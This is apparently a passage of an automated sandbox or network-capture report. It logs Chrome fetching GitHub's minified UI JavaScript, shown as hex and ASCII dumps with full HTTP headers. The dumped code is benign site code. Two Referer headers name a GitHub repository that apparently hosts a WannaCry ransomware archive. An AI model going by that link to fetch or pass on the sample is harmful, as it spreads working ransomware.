                                                                                      Data Ascii: e=>{x(e),r?.(e)},[r,x]),R=(0,y.useMemo)(()=>m?{initialFocusRef:u}:{initialFocusRef:u,disabled:!0},[m,u]);return(0,a.jsx)(k.w,{open:f,overlayProps:{role:"dialog",width:"medium"},onOpen:()=>w(!0),onClose:()=>!d&&w(!1),renderAnchor:e=>(0,a.jsxs)(a.Fragment,{
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 43 6c 69 63 6b 3a 74 2c 68 72 65 66 3a 72 2c 73 78 3a 6e 7d 29 7b 6c 65 74 20 69 3d 28 30 2c 61 2e 6a 73 78 29 28 68 2e 5a 2c 7b 73 78 3a 7b 2e 2e 2e 6e 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 7d 29 2c 73 3d 7b 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 30 7d 7d 3b 72 65 74 75 72 6e 20 72 3f 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 53 2e 4c 69 6e 6b 49 74 65 6d 2c 7b 72 6f 6c 65 3a 22 6c 69 6e 6b 22 2c 68 72 65 66 3a 72 2c 6f 6e 43 6c 69 63 6b 3a 28 29 3d 3e 74 3f 2e 28 29 2c 2e 2e 2e 73 2c 63 68 69 6c 64 72 65 6e 3a 69 7d 29 3a 28 30 2c 61 2e 6a 73 78 29 28 6f 2e 53 2e 49 74 65 6d 2c 7b 72 6f 6c 65 3a 22 62 75 74 74 6f 6e 22 2c 6f 6e 53 65 6c 65 63 74 3a 28 29 3d 3e 74 3f 2e 28 29 2c 2e 2e 2e 73 2c 63 68 69 6c 64 72 65 6e 3a 69 7d 29 7d 74 72 79 7b 45 2e 64 69 73 70
                                                                                      Data Ascii: Click:t,href:r,sx:n}){let i=(0,a.jsx)(h.Z,{sx:{...n},children:e}),s={sx:{minWidth:0}};return r?(0,a.jsx)(o.S.LinkItem,{role:"link",href:r,onClick:()=>t?.(),...s,children:i}):(0,a.jsx)(o.S.Item,{role:"button",onSelect:()=>t?.(),...s,children:i})}try{E.disp
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2c 7b 2e 2e 2e 65 7d 29 3a 28 30 2c 61 2e 6a 73 78 29 28 44 2c 7b 2e 2e 2e 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 7b 72 65 66 73 3a 65 2c 64 65 66 61 75 6c 74 42 72 61 6e 63 68 3a 74 2c 63 75 72 72 65 6e 74 43 6f 6d 6d 69 74 69 73 68 3a 72 2c 67 65 74 48 72 65 66 3a 6e 2c 66 69 6c 74 65 72 54 65 78 74 3a 69 2c 6f 6e 53 65 6c 65 63 74 49 74 65 6d 3a 73 7d 29 7b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 68 2e 5a 2c 7b 73 78 3a 7b 6d 61 78 48 65 69 67 68 74 3a 33 33 30 2c 6f 76 65 72 66 6c 6f 77 59 3a 22 61 75 74 6f 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6d 61 70 28 63 3d 3e 28 30 2c 61 2e 6a 73 78 29 28 46 2c 7b 68 72 65 66 3a 6e 3f 2e 28 63 29 2c 69 73 43 75 72 72 65 6e 74 3a 72 3d 3d 3d 63 2c 69 73 44 65 66 61 75 6c 74 3a 74 3d 3d 3d 63 2c
                                                                                      Data Ascii: ,{...e}):(0,a.jsx)(D,{...e})}function D({refs:e,defaultBranch:t,currentCommitish:r,getHref:n,filterText:i,onSelectItem:s}){return(0,a.jsx)(h.Z,{sx:{maxHeight:330,overflowY:"auto"},children:e.map(c=>(0,a.jsx)(F,{href:n?.(c),isCurrent:r===c,isDefault:t===c,
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 70 65 73 3a 73 2c 68 6f 74 4b 65 79 3a 6c 2c 6f 6e 4f 70 65 6e 43 68 61 6e 67 65 3a 6f 2c 73 69 7a 65 3a 68 2c 67 65 74 48 72 65 66 3a 64 2c 6f 6e 42 65 66 6f 72 65 43 72 65 61 74 65 3a 75 2c 6f 6e 52 65 66 54 79 70 65 43 68 61 6e 67 65 64 3a 66 2c 63 75 72 72 65 6e 74 43 6f 6d 6d 69 74 69 73 68 3a 78 2c 6f 6e 43 72 65 61 74 65 45 72 72 6f 72 3a 6d 2c 6f 6e 53 65 6c 65 63 74 49 74 65 6d 3a 70 2c 63 6c 6f 73 65 4f 6e 53 65 6c 65 63 74 3a 67 2c 73 65 6c 65 63 74 65 64 52 65 66 54 79 70 65 3a 62 2c 63 75 73 74 6f 6d 46 6f 6f 74 65 72 49 74 65 6d 50 72 6f 70 73 3a 53 2c 62 75 74 74 6f 6e 43 6c 61 73 73 4e 61 6d 65 3a 6a 2c 61 6c 6c 6f 77 52 65 73 69 7a 69 6e 67 3a 77 2c 69 64 45 6e 64 69 6e 67 3a 6b 2c 75 73 65 46 6f 63 75 73 5a 6f 6e 65 3a 4e 7d 3d 65 2c 5b
                                                                                      Data Ascii: pes:s,hotKey:l,onOpenChange:o,size:h,getHref:d,onBeforeCreate:u,onRefTypeChanged:f,currentCommitish:x,onCreateError:m,onSelectItem:p,closeOnSelect:g,selectedRefType:b,customFooterItemProps:S,buttonClassName:j,allowResizing:w,idEnding:k,useFocusZone:N}=e,[
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 64 2c 6d 2c 56 2e 73 65 61 72 63 68 49 6e 64 65 78 5d 29 2c 55 3d 28 30 2c 79 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 61 73 79 6e 63 28 29 3d 3e 7b 69 66 28 61 77 61 69 74 20 52 28 47 2c 45 29 29 7b 42 28 21 30 29 2c 44 28 21 31 29 3b 72 65 74 75 72 6e 7d 42 28 21 31 29 2c 44 28 21 31 29 2c 51 28 29 7d 2c 5b 47 2c 45 2c 51 2c 42 5d 29 2c 59 3d 28 30 2c 79 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 48 28 65 29 2c 66 3f 2e 28 65 29 7d 2c 5b 48 2c 66 5d 29 3b 66 75 6e 63 74 69 6f 6e 20 58 28 29 7b 5a 28 21 31 29 7d 6c 65 74 20 4a 3d 28 30 2c 79 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 65 2c 74 29 3d 3e 7b 70 3f 2e 28 65 2c 74 29 2c 58 28 29 7d 2c 5b 70 5d 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 73 29 28 61 2e 46 72 61 67 6d 65 6e 74
                                                                                      Data Ascii: d,m,V.searchIndex]),U=(0,y.useCallback)(async()=>{if(await R(G,E)){B(!0),D(!1);return}B(!1),D(!1),Q()},[G,E,Q,B]),Y=(0,y.useCallback)(e=>{H(e),f?.(e)},[H,f]);function X(){Z(!1)}let J=(0,y.useCallback)((e,t)=>{p?.(e,t),X()},[p]);return(0,a.jsxs)(a.Fragment


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      65192.168.2.1649770185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-239b92c64d22.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 12634
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 17:38:38 GMT
                                                                                      ETag: 0x8DC483B692070CF
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 75612
                                                                                      X-Served-By: cache-iad-kjyo7100055-IAD, cache-ewr18124-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 34, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 6988adf64564211e7939999f99ec2f870943138f
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6d 6d 69 74 2d 61 74 74 72 69 62 75 74 69 6f 6e 5f 69 6e 64 65 78 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6d 6d 69 74 2d 63 68 65 63 6b 73 2d 73 74 61 74 75 73 5f 69 6e 64 65 78 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 2d 61 37 33 64 36 35 22 5d 2c 7b 35 33 39 32 34 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 64 28 74 2c 7b 44 3a 28 29 3d 3e 6a 2c 43 3a 28 29 3d 3e 44 7d 29 3b 76 61 72 20 72 3d 61 28 38 35 38 39 33 29 2c 6f 3d 61 28 37 39 38 30 34 29 2c 69 3d 61 28 32 32 33 32 36
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65"],{53924:(e,t,a)=>{a.d(t,{D:()=>j,C:()=>D});var r=a(85893),o=a(79804),i=a(22326
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 65 2e 70 61 74 68 3f 28 30 2c 72 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 68 72 65 66 3a 65 2e 70 61 74 68 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 61 76 61 74 61 72 2d 69 63 6f 6e 2d 6c 69 6e 6b 22 2c 22 64 61 74 61 2d 68 6f 76 65 72 63 61 72 64 2d 75 72 6c 22 3a 65 2e 6c 6f 67 69 6e 3f 28 30 2c 69 2e 7a 50 29 28 7b 6f 77 6e 65 72 3a 65 2e 6c 6f 67 69 6e 7d 29 3a 76 6f 69 64 20 30 2c 63 68 69 6c 64 72 65 6e 3a 68 7d 29 3a 68 2c 65 2e 6c 6f 67 69 6e 3f 28 30 2c 72 2e 6a 73 78 29 28 75 2c 7b 61 75 74 68 6f 72 3a 65 2c 72 65 6e 64 65 72 54 6f 6f 6c 74 69 70 3a 64 2e 69 6e 63 6c 75 64 65 54 6f 6f 6c 74 69 70 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 72 2e 6a 73 78 29 28 6c 2e 5a 2c 7b 6d 75 74 65 64 3a 21 30 2c 68 72 65 66 3a 28 30 2c 69 2e 4f 49 29 28 7b 72 65
                                                                                      Data Ascii: e.path?(0,r.jsx)(l.Z,{href:e.path,"data-testid":"avatar-icon-link","data-hovercard-url":e.login?(0,i.zP)({owner:e.login}):void 0,children:h}):h,e.login?(0,r.jsx)(u,{author:e,renderTooltip:d.includeTooltip,children:(0,r.jsx)(l.Z,{muted:!0,href:(0,i.OI)({re
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 53 2e 4c 69 6e 6b 49 74 65 6d 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 72 6f 77 22 2c 66 6f 6e 74 53 69 7a 65 3a 31 2c 70 79 3a 32 2c 63 6f 6c 6f 72 3a 22 66 67 2e 64 65 66 61 75 6c 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 63 61 6e 76 61 73 2e 73 75 62 74 6c 65 22 7d 7d 2c 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6e 74 72 69 62 75 74 6f 72 2d 64 69 61 6c 6f 67 2d 72 6f 77 22 2c 68 72 65 66 3a 28 30 2c 69 2e 4f 49 29 28 7b 72 65 70 6f 3a 74 2c 61 75 74 68 6f 72 3a 65 2e 6c 6f 67 69 6e 3f 3f 22 22 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6f 2e 4f 2c 7b 73 72 63 3a 65 2e 61 76 61 74 61 72 55 72 6c 2c 61
                                                                                      Data Ascii: S.LinkItem,{sx:{display:"flex",flexDirection:"row",fontSize:1,py:2,color:"fg.default","&:hover":{backgroundColor:"canvas.subtle"}},"data-testid":"contributor-dialog-row",href:(0,i.OI)({repo:t,author:e.login??""}),children:[(0,r.jsx)(o.O,{src:e.avatarUrl,a
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 6c 6f 72 2c 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 6c 6f 67 69 6e 7d 29 7d 29 3a 28 30 2c 72 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 57 65 69 67 68 74 3a 6f 2e 66 6f 6e 74 57 65 69 67 68 74 2c 77 68 69 74 65 53 70 61 63 65 3a 22 6e 6f 77 72 61 70 22 2c 63 6f 6c 6f 72 3a 6f 2e 66 6f 6e 74 43 6f 6c 6f 72 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7d 29 7d 29 3a 6e 75 6c 6c 7d 74 72 79 7b 5a 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 28 5a 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 41 75 74 68 6f 72 4c 69 6e 6b 22 29 7d 63 61 74 63 68 7b 7d 66 75 6e 63 74 69 6f 6e 20 49 28 7b 61 75 74 68 6f 72 3a 65 2c 72 65 70 6f 3a 74 7d 29 7b 72 65
                                                                                      Data Ascii: lor,textDecoration:"underline"}},children:e.login})}):(0,r.jsx)(s.Z,{sx:{fontWeight:o.fontWeight,whiteSpace:"nowrap",color:o.fontColor},children:e.displayName})}):null}try{Z.displayName||(Z.displayName="AuthorLink")}catch{}function I({author:e,repo:t}){re
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 72 73 3a 65 2c 72 65 70 6f 3a 6f 7d 29 2c 61 3f 28 30 2c 72 2e 6a 73 78 73 29 28 72 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 70 6c 2d 31 22 2c 63 68 69 6c 64 72 65 6e 3a 6c 3f 22 61 75 74 68 6f 72 65 64 20 61 6e 64 22 3a 22 61 6e 64 22 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 5a 2c 7b 61 75 74 68 6f 72 3a 74 2c 72 65 70 6f 3a 6f 2c 73 78 3a 7b 70 6c 3a 31 7d 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 5a 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 78 3a 68 2c 63 68 69 6c 64 72 65 6e 3a 6c 26 26 22 63 6f 6d 6d 69 74 74 65 64 22 7d 29 5d 7d 29 3a 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 5a 2c 7b 61 73 3a 22 73 70 61 6e 22 2c 73 78 3a 68 2c 63 68 69 6c 64 72 65
                                                                                      Data Ascii: rs:e,repo:o}),a?(0,r.jsxs)(r.Fragment,{children:[(0,r.jsx)("span",{className:"pl-1",children:l?"authored and":"and"}),(0,r.jsx)(Z,{author:t,repo:o,sx:{pl:1}}),(0,r.jsx)(n.Z,{as:"span",sx:h,children:l&&"committed"})]}):(0,r.jsx)(n.Z,{as:"span",sx:h,childre
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 58 49 63 6f 6e 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 22 64 61 6e 67 65 72 2e 66 67 22 7d 7d 7d 28 65 2e 69 63 6f 6e 29 2c 6c 3d 22 69 6e 5f 70 72 6f 67 72 65 73 73 22 3d 3d 3d 65 2e 73 74 61 74 65 3b 72 65 74 75 72 6e 28 30 2c 72 2e 6a 73 78 73 29 28 75 2e 5a 2c 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 68 65 63 6b 2d 72 75 6e 2d 69 74 65 6d 22 2c 61 73 3a 22 6c 69 22 2c 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 57 69 64 74 68 3a 22 31 70 78 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 53 74 79 6c 65 3a 22 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 43 6f 6c 6f 72 3a 22 62 6f 72 64 65 72 2e 64 65 66 61 75 6c 74 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 63 61 6e 76 61 73 2e 73
                                                                                      Data Ascii: XIcon,iconColor:"danger.fg"}}}(e.icon),l="in_progress"===e.state;return(0,r.jsxs)(u.Z,{"data-testid":"check-run-item",as:"li",sx:{display:"flex",borderBottomWidth:"1px",borderBottomStyle:"solid",borderBottomColor:"border.default",backgroundColor:"canvas.s
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 2e 61 64 64 69 74 69 6f 6e 61 6c 43 6f 6e 74 65 78 74 7d 29 3a 65 2e 61 64 64 69 74 69 6f 6e 61 6c 43 6f 6e 74 65 78 74 2c 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 26 26 28 30 2c 72 2e 6a 73 78 73 29 28 6e 2e 5a 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 22 20 22 2c 22 2d 20 22 2c 65 2e 70 65 6e 64 69 6e 67 3f 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 5a 2c 7b 73 78 3a 7b 66 6f 6e 74 53 74 79 6c 65 3a 22 69 74 61 6c 69 63 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 7d 29 3a 65 2e 64 65 73 63 72 69 70 74 69 6f 6e 5d 7d 29 5d 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6d 2e 5a 2c 7b 68 72 65 66 3a 65 2e 74 61 72 67 65 74 55 72 6c 2c 73 78 3a 7b 70 6c 3a 22 31 32 70 78 22 2c 66 6f 6e 74 53 69 7a 65 3a 22 31 33 70 78 22 2c 6d 61 72 67 69 6e 4c 65
                                                                                      Data Ascii: .additionalContext}):e.additionalContext,e.description&&(0,r.jsxs)(n.Z,{children:[" ","- ",e.pending?(0,r.jsx)(n.Z,{sx:{fontStyle:"italic"},children:e.description}):e.description]})]}),(0,r.jsx)(m.Z,{href:e.targetUrl,sx:{pl:"12px",fontSize:"13px",marginLe
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 28 78 2e 56 2c 7b 6f 6e 43 6c 6f 73 65 3a 6f 2c 73 78 3a 7b 6f 76 65 72 66 6c 6f 77 59 3a 22 61 75 74 6f 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 63 61 6e 76 61 73 2e 64 65 66 61 75 6c 74 22 2c 62 6f 78 53 68 61 64 6f 77 3a 22 6e 6f 6e 65 22 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 62 6f 72 64 65 72 2e 64 65 66 61 75 6c 74 22 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 3a 30 7d 2c 74 69 74 6c 65 3a 69 2c 73 75 62 74 69 74 6c 65 3a 74 3f 74 2e 63 68 65 63 6b 73 53 74 61 74 75 73 53 75 6d 6d 61 72 79 3a 76 6f 69 64 20 30 2c 77 69 64 74 68 3a 22 78 6c 61 72 67 65 22 2c 72 65 6e 64 65 72 42 6f 64 79 3a 28 29 3d 3e 28 30 2c 72 2e 6a 73 78 29 28 78 2e 56 2e 42 6f 64 79 2c 7b 73 78 3a 7b 70 61
                                                                                      Data Ascii: (x.V,{onClose:o,sx:{overflowY:"auto",backgroundColor:"canvas.default",boxShadow:"none",border:"1px solid",borderColor:"border.default",borderBottom:0},title:i,subtitle:t?t.checksStatusSummary:void 0,width:"xlarge",renderBody:()=>(0,r.jsx)(x.V.Body,{sx:{pa
                                                                                      2024-03-23 14:47:25 UTC1378INData Raw: 73 63 72 69 70 74 69 6f 6e 54 65 78 74 3a 68 2c 69 63 6f 6e 3a 43 2c 69 63 6f 6e 43 6f 6c 6f 72 3a 76 7d 29 3a 28 30 2c 72 2e 6a 73 78 73 29 28 72 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 68 3f 28 30 2c 72 2e 6a 73 78 29 28 6c 2e 72 2c 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 68 65 63 6b 73 2d 73 74 61 74 75 73 2d 62 61 64 67 65 2d 62 75 74 74 6f 6e 22 2c 6c 65 61 64 69 6e 67 56 69 73 75 61 6c 3a 43 2c 76 61 72 69 61 6e 74 3a 22 69 6e 76 69 73 69 62 6c 65 22 2c 73 69 7a 65 3a 75 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 61 3f 2e 63 68 65 63 6b 73 53 74 61 74 75 73 53 75 6d 6d 61 72 79 3f 3f 60 53 74 61 74 75 73 20 63 68 65 63 6b 73 3a 20 24 7b 74 7d 60 2c 73 78 3a 7b 70 3a 31 2c 63 6f 6c 6f 72 3a 22 66 67 2e 64 65 66 61 75
                                                                                      Data Ascii: scriptionText:h,icon:C,iconColor:v}):(0,r.jsxs)(r.Fragment,{children:[h?(0,r.jsx)(l.r,{"data-testid":"checks-status-badge-button",leadingVisual:C,variant:"invisible",size:u,"aria-label":a?.checksStatusSummary??`Status checks: ${t}`,sx:{p:1,color:"fg.defau
                                                                                      2024-03-23 14:47:25 UTC232INData Raw: 2c 69 2e 66 70 29 28 64 2c 75 29 2c 28 30 2c 72 2e 6a 73 78 29 28 6e 2e 72 55 2c 7b 74 6f 3a 65 2c 2e 2e 2e 61 2c 72 65 6c 6f 61 64 44 6f 63 75 6d 65 6e 74 3a 74 2c 72 65 66 3a 63 7d 29 7d 29 3b 63 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 22 4c 69 6e 6b 22 7d 7d 5d 29 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6d 6d 69 74 2d 61 74 74 72 69 62 75 74 69 6f 6e 5f 69 6e 64 65 78 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 6d 6d 69 74 2d 63 68 65 63 6b 73 2d 73 74 61 74 75 73 5f 69 6e 64 65 78 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 2d 61 37 33 64 36 35 2d 34 65 62 34 65 64 37 31 35 31 38 35 2e 6a 73 2e 6d 61 70
                                                                                      Data Ascii: ,i.fp)(d,u),(0,r.jsx)(n.rU,{to:e,...a,reloadDocument:t,ref:c})});c.displayName="Link"}}]);//# sourceMappingURL=ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-4eb4ed715185.js.map


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      66192.168.2.1649771185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:25 UTC736OUTGET /assets/app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-3e492a-f8db4e5bb6ca.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:25 UTC685INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 71455
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 21 Mar 2024 18:12:35 GMT
                                                                                      ETag: 0x8DC49D27C774E16
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:25 GMT
                                                                                      Age: 75613
                                                                                      X-Served-By: cache-iad-kiad7000026-IAD, cache-ewr18126-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 33, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 13e4c3a910967eea2b6d8d01d05d1d6c45cda176
                                                                                      2024-03-23 14:47:25 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 72 65 61 63 74 2d 73 68 61 72 65 64 5f 68 6f 6f 6b 73 5f 75 73 65 2d 63 61 6e 6f 6e 69 63 61 6c 2d 6f 62 6a 65 63 74 5f 74 73 2d 75 69 5f 70 61 63 6b 61 67 65 73 5f 63 6f 64 65 2d 76 69 65 77 2d 73 68 61 72 65 64 5f 68 6f 2d 33 65 34 39 32 61 22 5d 2c 7b 35 35 38 32 32 3a 28 65 2c 74 2c 72 29 3d 3e 7b 72 2e 64 28 74 2c 7b 66 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 69 3d 72 28 36 37 32 39 34 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 6c 65 74 20 74 3d 28 30 2c 69 2e 75 73 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-3e492a"],{55822:(e,t,r)=>{r.d(t,{f:()=>o});var i=r(67294);function o(e){let t=(0,i.use
